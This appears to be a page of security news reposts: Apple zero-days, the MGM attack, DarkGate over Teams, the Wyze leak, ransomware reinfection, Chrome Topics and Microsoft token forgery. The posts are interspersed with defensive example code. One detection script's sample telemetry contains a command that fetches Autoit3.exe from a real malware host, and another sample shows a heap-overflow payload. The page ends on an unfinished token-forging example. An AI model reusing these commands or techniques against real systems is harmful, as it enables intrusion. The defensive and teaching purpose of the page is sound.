IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Two Apple issues added by CISA to its catalog of known exploited vulnerabilities

The Cybersecurity & Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. This means that Federal Civilian Executive Branch (FCEB) agencies need to remediate these vulnerabilities by October 2, 2023 in order to protect their devices against active threats. We urge everyone else to take them seriously too.

Apple released security updates for several products to address these vulnerabilities on September 7, 2023, with updates for older iOS and macOS versions following on September 11.

An overview of the updates that are available at the time of writing:

Name and information link     | Available for                                                                                                                                     | Release date
iOS 15.7.9 and iPadOS 15.7.9  | iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation) | 11 Sep 2023
macOS Monterey 12.6.9         | macOS Monterey                                                                                                                                    | 11 Sep 2023
macOS Big Sur 11.7.10         | macOS Big Sur                                                                                                                                     | 11 Sep 2023
macOS Ventura 13.5.2          | macOS Ventura                                                                                                                                     | 07 Sep 2023
iOS 16.6.1 and iPadOS 16.6.1  | iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later | 07 Sep 2023
watchOS 9.6.2                 | Apple Watch Series 4 and later                                                                                                                    | 07 Sep 2023


The updates may already have reached you in your regular update routines, but it doesn’t hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.

How to update your iPhone or iPad.

How to update macOS on Mac.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs added to the Catalog of Known Exploited Vulnerabilities are:

CVE-2023-41064: A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6.9, macOS Big Sur 11.7.10, macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1, iOS 15.7.9 and iPadOS 15.7.9. Processing a maliciously crafted image may lead to arbitrary code execution.

A buffer overflow is a type of software vulnerability that occurs when a program writes more data into a fixed-size region of memory than that region can hold, so the excess spills into whatever happens to sit in the adjacent memory. In exploit code, the two areas most commonly targeted for overflows are the stack and the heap.

The heap is an area of memory made available to the program for data whose size is only known at run time. The program requests blocks of memory from the heap as it needs them: to allocate a block of some size, it makes an explicit request by calling the heap allocation function, and the block it receives typically sits right next to other blocks. An overflow of a heap buffer therefore overwrites neighbouring data, which is what typically makes a crafted image dangerous: the decoder allocates a buffer sized from what the image claims about itself and then copies in more than that.
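To make the mechanism concrete, here is an added example that is not Apple’s code and does not model the actual ImageIO bug: a toy heap and a decoder for a constructed image format (“TIMG”, assumed here) in which the copy length comes from the file while the buffer size comes from the image dimensions. The unchecked decoder overwrites whatever allocation sits next to the pixel buffer; the bounds-checked one rejects the file.

```python
import struct

HEADER = struct.Struct("<HHI")   # width, height, payload length (constructed "TIMG" layout)
NEIGHBOUR = b"handler\0"        # stand-in for an unrelated object allocated next to the pixels


class ToyHeap:
    """A flat byte array standing in for a process heap. alloc() hands out
    consecutive offsets, so two allocations are neighbours, as they often are
    under a real allocator."""

    def __init__(self, size: int = 64) -> None:
        self.mem = bytearray(size)
        self.next = 0

    def alloc(self, size: int) -> tuple:
        off, self.next = self.next, self.next + size
        return off, size

    def write_unchecked(self, off: int, data: bytes) -> None:
        # memcpy-style: trusts the caller's length, so it can run past the block.
        end = off + len(data)
        if end > len(self.mem):
            raise MemoryError("write past the end of the toy heap (would crash)")
        self.mem[off:end] = data

    def write_checked(self, off: int, size: int, data: bytes) -> None:
        # The fix: the copy is bounded by the allocation, not by the file.
        if len(data) > size:
            raise ValueError(f"payload of {len(data)} bytes exceeds {size}-byte buffer")
        self.mem[off:off + len(data)] = data


def build_image(width: int, height: int, payload: bytes) -> bytes:
    """Serialise a TIMG file. A well-formed file has len(payload) == width * height."""
    return HEADER.pack(width, height, len(payload)) + payload


def decode(image: bytes, checked: bool) -> tuple:
    """Decode a TIMG file into a freshly allocated pixel buffer.

    Returns (pixel_buffer, neighbour_object) so the caller can see whether the
    neighbour survived. With checked=False the copy trusts the length field
    in the file, which the attacker controls."""
    width, height, payload_len = HEADER.unpack_from(image)
    payload = image[HEADER.size:HEADER.size + payload_len]
    heap = ToyHeap()
    pix_off, pix_size = heap.alloc(width * height)   # size comes from the dimensions...
    nb_off, nb_size = heap.alloc(len(NEIGHBOUR))     # ...and some other object lands right after
    heap.write_unchecked(nb_off, NEIGHBOUR)
    if checked:
        heap.write_checked(pix_off, pix_size, payload)  # ...while the copy length came from the file
    else:
        heap.write_unchecked(pix_off, payload)
    return bytes(heap.mem[pix_off:pix_off + pix_size]), bytes(heap.mem[nb_off:nb_off + nb_size])


def is_rejected(image: bytes) -> bool:
    """True if the bounds-checked decoder refuses the file."""
    try:
        decode(image, checked=True)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    good = build_image(2, 2, b"ABCD")
    evil = build_image(2, 2, b"ABCD" + b"PWNED!!\0")   # 12 bytes of payload for a 4-byte buffer
    print("benign :", decode(good, checked=False))
    print("crafted:", decode(evil, checked=False))   # neighbour now reads b'PWNED!!\x00'
    print("checked decoder rejects crafted file:", is_rejected(evil))
```

In a real decoder the neighbour is not a harmless string but could be a heap metadata block or an object holding a function pointer, which is how “processing a maliciously crafted image” turns into code execution.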

CVE-2023-41061: A validation issue was addressed with improved logic. This issue is fixed in watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1. A maliciously crafted attachment may result in arbitrary code execution.

At the time of the patches being released, Apple said it was aware of a report that these issues may have been actively exploited.

The vulnerabilities were discovered as zero-days by Citizen Lab while checking the device of an individual employed by a Washington DC-based civil society organization with international offices. Together, the two vulnerabilities were used in an attack chain dubbed BLASTPASS. The exploit chain was capable of compromising iPhones running what was then the latest version of iOS (16.6) without any interaction from the victim, and was reportedly used by the NSO Group to deliver the Pegasus spyware.


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Major cyberattack leaves MGM Resorts reeling

A major incident impacting MGM Resorts has caused computer shutdowns all over the US. The systems most impacted are tied to casinos and hotel computer systems. According to the AP, locations caught by this shutdown range from New York and Ohio to Michigan and Mississippi.

At this point I’d link to the post on the company website explaining what’s occurred but at time of writing, the site tends to not load properly which is probably due to heavy traffic. When it does, it simply says that the MGM Resorts website is currently unavailable and gives visitors a list of contact numbers. AP also mentions that other MGM websites have been replaced with “back soon” style pages while the clean up from the attack is no doubt still ongoing.

At present, what’s available is a selection of posts made to X (formerly Twitter) giving brief details of the incident.

This is what MGM Resorts has to say on the matter:

MGM Resorts recently identified a cybersecurity issue affecting some of the company’s systems. Promptly after detecting the issue, we quickly began an investigation with assistance from leading external cybersecurity experts.  We also notified law enforcement and took prompt action to protect our systems and data, including shutting down certain systems. Our investigation is ongoing, and we are working diligently to determine the nature and scope of the matter.

MGM goes on to say that “resorts are fully operational”. Meanwhile, BBC reporter Joe Tidy reports that slot machines and casino floors were left empty, and that physical room keys had to be distributed. An additional admin error caused a guest to walk in on someone else. Clearly things are not going swimmingly for MGM Resorts.

Some systems are slowly coming back to life, but there’s no estimate for when full functionality will be restored. The initial fallout of the attack seems to have been the worst of it, with reports of “thousands” of guests locked out of their rooms.

In terms of what the attack could mean for guests, it’s too early to say. MGM has not touched on whether or not customer data has been breached or exfiltrated, and if the culprit is ransomware this could rumble on for days or weeks. Nobody wants to think about their personal data being wrapped up and dropped onto a data dump website, but as with all these incidents it is a distinct possibility. Unverified sources are claiming this to be the case, but we would suggest sticking to official sources only.

If you’re a guest at an MGM resort, don’t panic. Keep note of the contact numbers, and ask staff what the process is for keeping you informed of any breaking developments. An abundance of caution would suggest monitoring credit and debit card payments for a little while, along with watching out for any MGM themed emails. If you do receive the latter, go back to an official point of contact and verify its authenticity. Sometimes organisations send out emails which are genuine, but look suspicious. It’s always better to check.

If this attack does prove to be ransomware, the next development we hear about could be the attackers announcing a data dump or additional demands. For the time being, don’t panic and try to enjoy your resort time as best as you can given the unusual circumstances.



Microsoft Teams used to deliver DarkGate Loader malware

Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But Malwarebytes has also seen DarkGate being delivered via malvertising and SEO poisoning campaigns.

A cybercriminal who goes by the handle RastaFarEye has been advertising DarkGate Loader on cybercrime forums since June 16, 2023. Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing.

What’s new is that the researchers found evidence of a campaign using Microsoft Teams to deliver the DarkGate Loader.

“On August 29, in the timespan from 11:25 to 12:25 UTC, Microsoft Teams chat messages were sent from two external Office 365 accounts compromised prior to the campaign. The message content aimed to social engineer the recipients into downloading and opening a malicious file hosted remotely.”

The distributed link initially points to a traffic distribution system (TDS). If the requirements set by the attacker are met, the TDS will redirect the victim user to the final payload URL for the MSI download. When the user opens the downloaded MSI file, the DarkGate infection is triggered.

The download locations observed in the Teams attacks were sharepoint.com URLs hosting .zip files with names like “Changes to the vacation schedule.zip.”  The ZIP file contains a malicious LNK file (shortcut) posing as a PDF document: “Changes to the vacation schedule.pdf.lnk.”

Clicking the shortcut runs a command line that downloads a renamed copy of cURL (a command-line tool for sending and retrieving data, including files, using URL syntax) and uses it to download and execute Autoit3.exe together with a bundled script. The pre-compiled AutoIt script hides its code in the middle of the file and, on execution, drops a new file that contains shellcode.

When the shellcode runs, the first thing it does is use the “byte by byte” technique, also known as stacked strings, to create a new file: a Windows executable identified as DarkGate Loader.
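The chain above maps onto a few simple endpoint detections. The following is an added example, not code from the researchers or from Malwarebytes, that runs them over a handful of constructed, Sysmon-style JSON events; the event field names and the sample lines are assumptions for the illustration, and the only real indicator used is the 5.188.87.58 address Malwarebytes names on this page.

```python
import json
import re
from typing import Iterable, List

DOUBLE_EXT_LNK = re.compile(r"\.(pdf|docx?|xlsx?|txt)\.lnk\b", re.IGNORECASE)
BLOCKED_IPS = {"5.188.87.58"}          # the download host Malwarebytes blocks (from this page)
TRUSTED_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> List[str]:
    """Return zero or more alerts for one process-creation or network event."""
    alerts = []
    kind = ev.get("EventType")
    image = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    if kind == "ProcessCreate":
        # Stage 1: a shortcut disguised as a document being opened.
        if DOUBLE_EXT_LNK.search(cmd):
            alerts.append(f"double-extension shortcut launched: {cmd}")
        # Stage 2: cURL renamed to something else (PE version info still says curl.exe).
        if ev.get("OriginalFileName", "").lower() == "curl.exe" and basename(image) != "curl.exe":
            alerts.append(f"renamed cURL binary: {image}")
        # Stage 3: the AutoIt interpreter run from a user-writable location with a script.
        if basename(image) == "autoit3.exe" and not image.lower().startswith(TRUSTED_DIRS):
            alerts.append(f"AutoIt3 from user-writable path: {cmd}")
    elif kind == "NetworkConnect" and ev.get("DestinationIp") in BLOCKED_IPS:
        alerts.append(f"connection to blocked host {ev['DestinationIp']} by {image}")
    return alerts


def analyze(lines: Iterable[str]) -> List[str]:
    """Run check_event over newline-delimited JSON events and collect alerts."""
    alerts = []
    for line in lines:
        line = line.strip()
        if line:
            alerts.extend(check_event(json.loads(line)))
    return alerts


# Constructed sample telemetry following the chain in the text (not real logs).
SAMPLE_EVENTS = r"""
{"EventType":"ProcessCreate","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c \"C:\\Users\\alice\\AppData\\Local\\Temp\\Changes to the vacation schedule.pdf.lnk\"","ParentImage":"C:\\Windows\\explorer.exe","OriginalFileName":"Cmd.Exe"}
{"EventType":"ProcessCreate","Image":"C:\\Users\\alice\\AppData\\Local\\Temp\\dat.exe","CommandLine":"dat.exe -o Autoit3.exe http://5.188.87.58/Autoit3.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","OriginalFileName":"curl.exe"}
{"EventType":"NetworkConnect","Image":"C:\\Users\\alice\\AppData\\Local\\Temp\\dat.exe","DestinationIp":"5.188.87.58","DestinationPort":80}
{"EventType":"ProcessCreate","Image":"C:\\Users\\alice\\AppData\\Local\\Temp\\Autoit3.exe","CommandLine":"Autoit3.exe script.au3","ParentImage":"C:\\Windows\\System32\\cmd.exe","OriginalFileName":"AutoIt3.exe"}
{"EventType":"ProcessCreate","Image":"C:\\Program Files\\Git\\mingw64\\bin\\curl.exe","CommandLine":"curl.exe https://example.org","ParentImage":"C:\\Windows\\System32\\cmd.exe","OriginalFileName":"curl.exe"}
"""

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS.splitlines()):
        print("ALERT:", alert)
```

The renamed-cURL rule is the one worth keeping even after the indicators change: the attacker can call the binary anything, but the OriginalFileName field in its version resource still says curl.exe, and a legitimate cURL on the box is almost always run under its own name from a known install path.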

Protection

Current Microsoft Teams security features such as Safe Attachments or Safe Links failed to detect or block this attack. BleepingComputer reported in June of 2023 that security researchers had found a simple way to deliver malware to an organization with Microsoft Teams, despite restrictions in the application for files from external sources. Microsoft Teams has client-side protections in place to block file delivery from external tenant accounts. But the restriction can be circumvented by changing the internal and external recipient ID in the POST request of a message, which ends up with Teams treating an external user as if it was an internal one.

The only way to prevent this attack vector within Microsoft Teams is to only allow Microsoft Teams chat requests from specific external domains. This may be troublesome in some environments since this means that all trusted external domains need to be whitelisted by an IT administrator.

Malwarebytes customers are protected against this attack as Malwarebytes blocks the C2 server hosting the downloaded files. Malwarebytes detects the LNK file and the scripts as Trojan.DarkGate.

Malwarebytes blocks 5.188.87.58




Re-air: What teenagers face growing up online: Lock and Code S04E19

This week on the Lock and Code podcast…

In 2022, Malwarebytes investigated the blurry, shifting idea of “identity” on the internet, and how online identities are not only shaped by the people behind them, but also inherited by the internet’s youngest users, children. Children have always inherited some of their identities from their parents—consider that two of the largest indicators for political and religious affiliation in the US are, no surprise, the political and religious affiliations of someone’s parents—but the transfer of online identity poses unique risks.  

When parents create email accounts for their kids, do they also teach their children about strong passwords? When parents post photos of their children online, do they also teach their children about the safest ways to post photos of themselves and others? When parents create a Netflix viewing profile on a child’s iPad, are they prepared for what else a child might see online? Are parents certain that a kid is ready to watch before they can walk?

Those types of questions drove a joint report that Malwarebytes published last year, based on a survey of 2,000 people in North America. That research showed that, broadly, not enough children and teenagers trust their parents to support them online, and not enough parents know exactly how to give the support their children need.

But stats and figures can only tell so much of the story, which is why last year, Lock and Code host David Ruiz spoke with a Bay Area high school graduate about her own thoughts on the difficulties of growing up online. Lock and Code is re-airing that episode this week because, in less than one month, Malwarebytes is releasing a follow-on report about behaviors, beliefs, and blunders in online privacy and cybersecurity. And as part of that follow-on report, Lock and Code is speaking again with the guest brought on last year, Nitya Sharma. 

Before our follow-on report releases, we are sharing with listeners our prior episode that aired in 2022 about the difficulties that an everyday teenager faces online, including managing her time online, trying to meet friends and complete homework, the traps of trading online interaction with in-person socializing, and what she would do differently with her children, if she ever started a family, in preparing them for the Internet.

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

A week in security (September 4 – September 10)

Wyze home cameras temporarily show other people’s security feeds

A mishap has resulted in security feeds and camera logs from home cameras being temporarily visible online. Users of Wyze, makers of smart products and home cameras, fell victim to this bizarre incident sometime around September 8.

One of the first posts about this appeared on Reddit, where a user highlighted that they were “seeing someone else’s webcam feed”. They’d logged onto the website to check their cameras and were met with someone else’s dog in someone else’s house. It didn’t take long before other people started reporting the same thing.

Here’s a bedroom, and (disturbingly) another Reddit user claiming to have seen people naked. While there’s no way to prove the latter claim, being able to view bedrooms and other spots around the house does at least make it a possibility.

As far as home cameras go, this is absolutely up there at the top of the “things you don’t want to happen” list. 

These were visible on the service’s web view located at view(dot)wyze(dot)com. According to a Wyze spokesperson, the situation was live for “about 30 minutes” and roughly ten users had their cameras visible online.

While there is no detailed additional information with regard to the specifics, Mashable notes that one Reddit user claims the cause was due to webpages being cached while on the viewer site then potentially shared with others. Wyze then confirmed to Mashable that the feed mashup did indeed originate from a “web caching issue”.
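Wyze has not published the technical detail, so the following is an added example rather than a description of their setup: a check for the response-caching mistake that typically produces exactly this symptom, a page rendered for one logged-in user being stored by a shared cache and served to the next. The header samples are constructed.

```python
from typing import Dict, List, Optional


def parse_cache_control(value: str) -> Dict[str, Optional[str]]:
    """'private, max-age=0, no-store' -> {'private': None, 'max-age': '0', 'no-store': None}"""
    directives: Dict[str, Optional[str]] = {}
    for part in value.split(","):
        part = part.strip().lower()
        if part:
            name, _, arg = part.partition("=")
            directives[name.strip()] = arg.strip().strip('"') if arg else None
    return directives


def audit_per_user_response(headers: Dict[str, str]) -> List[str]:
    """Findings for a response that carries one user's private data, such as a
    camera view page rendered for a logged-in account. Any cache shared between
    users (CDN, reverse proxy, shared browser cache) must not store it."""
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control", ""))
    vary = h.get("vary", "").lower()
    storable_for_others = "no-store" not in cc and "private" not in cc
    findings = []
    if not cc:
        findings.append("no Cache-Control header: caches may apply heuristic freshness")
    if "public" in cc:
        findings.append("Cache-Control: public on a per-user response")
    if storable_for_others:
        findings.append("neither no-store nor private: a shared cache may serve it to another user")
    if "s-maxage" in cc and cc["s-maxage"] not in (None, "0"):
        findings.append(f"s-maxage={cc['s-maxage']} explicitly allows shared caching")
    if "set-cookie" in h and "no-store" not in cc:
        findings.append("Set-Cookie on a storable response: session material may be cached")
    if storable_for_others and not any(f in vary for f in ("cookie", "authorization", "*")):
        findings.append("no Vary on Cookie/Authorization: one user's copy is the cache key for all users")
    return findings


# Constructed header sets for a logged-in camera view page (not Wyze's real responses).
RISKY_HEADERS = {"Cache-Control": "public, max-age=300", "Content-Type": "text/html"}
SAFE_HEADERS = {"Cache-Control": "private, no-store, max-age=0", "Content-Type": "text/html"}

if __name__ == "__main__":
    for name, hdrs in (("risky", RISKY_HEADERS), ("safe", SAFE_HEADERS)):
        print(name, audit_per_user_response(hdrs) or ["ok"])
```

Run this against every authenticated endpoint behind a CDN or reverse proxy; the Vary finding is defence in depth only, since a shared cache keyed on the cookie still holds user data, and `no-store` is the answer for anything per-user.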

If you’re curious, the official Wyze rundown reads as follows. It does not go into more detail than what’s already been revealed above:

This was a web caching issue and is now resolved. For about 30 minutes this afternoon, a small number of users who used a web browser to log in to their camera on view(dot)wyze(dot)com may have seen cameras of other users who also may have logged in through view(dot)wyze(dot)com during that time frame. The issue DID NOT affect the Wyze app or users that did not log in to view(dot)wyze(dot)com during that time period.

Once we identified the issue we shut down view(dot)wyze(dot)com for about an hour to investigate and fix the issue.

This experience does not reflect our commitment to users or the investments we’ve made over the last few years to enhance security. We are continuing to investigate this issue and will make efforts to ensure it doesn’t happen again. We’re also working to identify affected users.

We will let you know if there are any further updates.

If nothing else, it’s good news that no more feeds should be accidentally loaded up while checking your own Wyze viewing area. Having said that, this is a shockingly poor thing to have happened. We may simply never know for sure who was viewed, or what they may have been doing at the time.

If you have smart cameras in and around your home, it might be a good idea to check your settings. I’ve known people who’ve bought smart cameras and had no idea there was any sort of web or cloud based functionality. Not everything is local!

If you’re in your property when the cameras are running, what happened to those Wyze users is probably not going to happen to you. Even so, you may wish to revisit your setup. Consider turning off video and audio, or disabling any web-based feed. You can probably still record locally if you need to, or at least come to a privacy-focused setting which meets your needs. On the off chance that your equipment settings don’t fit with your expectations, you may need to be in the market for a new smart security system.



The main causes of ransomware reinfection

A few months ago, we wrote about a ransomware reinfection incident. Ransomware reinfection arguably could be even worse than being a first time victim. Unfortunately it happens more often than you may think.

Research shows that in 2022, more than a third (38%) of surveyed organizations fell victim to a repeat ransomware attack. This means that they were hit twice or more, either by the same or by different ransomware attackers.

Even paying the first time is not much help. A 2022 study found that 80% of companies that paid a ransom were hit again at a later time. Among those, 40% paid up a second time, with 70% of those companies paying a higher amount than they did after the first attack.

The most common reasons for reinfection are:

  • backdoors left behind by the criminals
  • credentials stolen in the course of the first attack
  • unpatched vulnerabilities
  • restoration of infected backups

In some ransomware attacks criminals have access to the target network for weeks or months, giving them ample opportunity to open a backdoor or otherwise retain the controls and permissions they need to return and trigger another attack. Another likely option to consider is that exploitation of a vulnerable network device may have provided the criminals with login credentials they can use to come right back, even after the vulnerability itself has been patched.

Every chain has a weakest link, but when one breaks it’s important to replace it with a stronger one. Vulnerable devices, services, and software either need to get patched or, when possible, should be taken off the internet. If neither is a viable option, it’s time to consider what’s cheaper: replacing the component with something more secure, or going through another ransomware attack. Other options are very strict access policies to limit the attackers’ options, network segmentation to limit the possible damage, and constant active monitoring to get an alert at the first sign of trouble. These options should not be treated as a “pick one” list; deploy all of them wherever possible.

Knowing the weakest link and figuring out what information the criminals may have obtained is why it’s important to conduct a full forensic examination after an incident. It is necessary to address the vulnerability that the criminals used to get in, any backdoors they may have left behind, and change credentials that may have been stolen.

Having recent, actionable backups is important to limit the disruption caused by the incident. But recent backups carry the risk of containing parts of the infection or backdoors, which is another reason why a forensic investigation is important. Once you have pinpointed the time of the initial breach, you can hold back anything created or changed after that point and avoid restoring files the attackers left behind.
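One way to act on that cut-off is to triage the backup catalog against the compromise time before anything is restored. This is an added example, not Malwarebytes’ tooling; the manifest format, the sample entries and the compromise timestamp are constructed for the illustration, and a real manifest would come from your backup product.

```python
from datetime import datetime, timedelta
from typing import Dict, List

SUSPECT_EXT = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".lnk", ".scr")


def parse_ts(value: str) -> datetime:
    """ISO 8601 with a trailing Z (UTC) -> aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def triage_backup(manifest: List[Dict[str, str]], compromise_time: str,
                  margin_hours: int = 24) -> Dict[str, List[str]]:
    """Split a backup manifest into what can be restored and what must be reviewed.

    Anything modified after (compromise time - margin) is held back, because it
    may be something the attackers created or changed; executable content in
    that set is flagged for analysis before any restore. The margin covers
    uncertainty about when the intrusion really started."""
    cutoff = parse_ts(compromise_time) - timedelta(hours=margin_hours)
    result: Dict[str, List[str]] = {"restore": [], "review": [], "analyze_first": []}
    for entry in manifest:
        if parse_ts(entry["mtime"]) < cutoff:
            result["restore"].append(entry["path"])
        else:
            result["review"].append(entry["path"])
            if entry["path"].lower().endswith(SUSPECT_EXT):
                result["analyze_first"].append(entry["path"])
    return result


# Constructed manifest; a real one would come from the backup product's catalog.
SAMPLE_MANIFEST = [
    {"path": r"C:\Data\finance\Q2-report.xlsx", "mtime": "2023-07-30T09:12:00Z"},
    {"path": r"C:\Data\archive\policy-2022.pdf", "mtime": "2022-01-04T15:00:00Z"},
    {"path": r"C:\Windows\Temp\svchost.exe", "mtime": "2023-08-19T10:41:00Z"},
    {"path": r"C:\Users\svc_backup\AppData\Roaming\update.ps1", "mtime": "2023-08-20T04:10:00Z"},
    {"path": r"C:\Data\contracts\acme.docx", "mtime": "2023-08-21T11:30:00Z"},
]
INITIAL_COMPROMISE = "2023-08-20T03:00:00Z"   # established by the forensic timeline (assumed value)

if __name__ == "__main__":
    for bucket, paths in triage_backup(SAMPLE_MANIFEST, INITIAL_COMPROMISE).items():
        print(bucket, paths)
```

Note that the “review” bucket is not automatically bad: the contracts document changed after the breach is probably legitimate work, but it only goes back once someone has confirmed that, and the two executables go to analysis before anything else is touched.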

Not only does a thorough forensic investigation help you find the cause that might be remediated, it’s important to be able to follow the tracks the attacker left in your network, so you can reconstruct what access they may have gained and what they may have copied, left behind, changed, or deleted.

To be able to perform an effective forensic investigation you need reliable logs, and preferably ones that are easy to interpret. Something to keep in mind when you’re shopping for an EDR or SIEM solution.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
  • Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Chrome’s “Enhanced Ad Privacy”: What you need to know

Users of Google’s Chrome web browser may wish to dig into their privacy settings as a new feature regarding advertising privacy slowly rolls out to the masses.

Google’s “Enhanced Ad Privacy” feature may soon appear in your browser, tied to choices regarding a new Chrome feature named Topics. This is one of several potential replacements for the increasingly outdated concept of third-party tracking cookies. However, there is a catch. Only a “small percentage” of Chrome users have so far seen the Ad Privacy popup, so it may not be something you experience yourself for some time to come. When it does arrive, however, you’ll need to know exactly what’s on offer with regard to the options provided.

It’s no secret that most major browsers are getting rid of third-party tracking cookies. Users don’t want a random collection of cookies on their systems contributing to a build up of shadowy profiles trailing them around the web.

Chrome has previously had to delay plans to sunset these kinds of cookies in the browser. Throughout this, there was an understanding that none of these products would scrap advertising entirely. It’s one of the main sources of revenue for any would-be internet giant.

In this case, Google has been coming up with several potential replacements. The primary driver for possible ad revenue is likely to be Topics. This is intended to replace the old way of doing things, enabling interest-based advertising minus the site visit tracking. The intention is for websites to ask Chrome what the user likes through the Topics JavaScript API, and then serve relevant ads with no cookie involvement.

Chrome selects these potential topics of interest by studying the user’s browser history. Essentially, if you visit a lot of sports websites then a site you’re on which queries the Topics API can be reasonably expected to come away with “sports” as one of your Topics. At this point, you’ll probably be seeing a lot of sports based adverts in your immediate browsing future.

This is where the Enhanced Ad Privacy feature comes into play. With the advent of Chrome 115, certain users have been seeing popups regarding these changes with regard to privacy settings. It makes sense to give users control over this functionality, and so the popup says the following:

We’re launching new privacy features that give you more choice over the ads you see. Chrome notes topics of interest based on your recent browsing history. Also, sites you visit can determine what you like. Later, sites can ask for this information to show you personalised ads. You can choose which topics and sites are used to show you ads.

To measure the performance of an ad, limited types of data are shared between sites such as the time of day an ad was shown to you.

If you want to opt-out of this new functionality, The Register reports that you need to click into settings and take appropriate steps to disable it. Some online circles are not enthused due to the “Got it” confirmation button at the bottom of the popup. This is because “Got it” may suggest that a new privacy feature has launched and has immediately disabled or reduced something, not signed you up to it.

In other words, if you do not want any part of the Topics API system, you need to click the settings link when faced with the popup and set about turning it all off. Compare and contrast with other versions of this popup, which say “No Thanks” and “Turn it on” instead of “Got it” and “Settings”.

Clearly this isn’t ideal, though as The Register notes, legal requirements in different regions mean some folks will experience an opt-in system and others will be opted-out. It’s entirely possible a lot of people out there may end up with it switched on when they want it off, and vice-versa. You can visit chrome://settings/adPrivacy in your Chrome browser to see if you have this enabled, along with several other relevant settings including topics you’ve blocked and links to cookie and site-suggested ads settings.

Users of Malwarebytes Browser Guard are protected from sites reading your Google Topics.



How Microsoft’s highly secure environment was breached

An investigation by Microsoft has finally revealed how China-based hackers circumvented the protections of a “highly isolated and restricted production environment” in May 2023 to unlock sensitive email accounts belonging to US government agencies.

The attack was first reported by Microsoft in July, in an article that left some important questions unanswered. The original article revealed that China-based hackers—dubbed Storm-0558 in accordance with Microsoft’s new threat actor naming scheme—had gained access to email accounts “affecting approximately 25 organizations in the public cloud including government agencies as well as related consumer accounts of individuals likely associated with these organizations.” Ars Technica describes those government accounts as “belonging to the US Departments of State and Commerce.”

The accounts, Microsoft says, were accessed using forged authentication tokens:

Microsoft investigations determined that Storm-0558 gained access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook.com by forging authentication tokens to access user email. 

Authentication tokens are the computer equivalent of the wristband you get at a concert, or the lanyard you’re issued at a cybersecurity conference. You show your ticket once, and in return you’re given a wrist band or lanyard that you have to keep on display at all times to show you belong.

In the case of Outlook.com, your username and password are the ticket that gets you through the door, and the authentication token is the lanyard you’re given that says you’re allowed to be there.

An attacker with your authentication token can pretend to be you without knowing your password, so tokens need to be hard to forge. To ensure they are, they’re backed by cryptography that hinges on a private cryptographic key that has to be kept very, very, very secure indeed.
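Here is an added example, not Microsoft’s code and deliberately not the real MSA or Azure AD token format, that shows in a few lines what the lanyard analogy means in practice: whoever holds the signing key can mint a token for any user that is indistinguishable from a real one, and the only defences are keeping that key out of reach and being able to retire it (and pin the accepted key IDs) quickly. It uses an HMAC secret in place of the private key, which is a simplification; the key IDs, secrets and user names are made up.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Dict, Optional


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_token(key: bytes, kid: str, claims: dict) -> str:
    """Anyone holding 'key' can produce a token the verifier accepts; that is
    the whole point of the example."""
    header = b64u(json.dumps({"alg": "HS256", "kid": kid}).encode())
    body = b64u(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64u(sig)}"


class TokenService:
    """Issues and verifies tokens. 'keys' maps a key ID (kid) to its secret;
    only kids listed in 'active' are accepted at verification time."""

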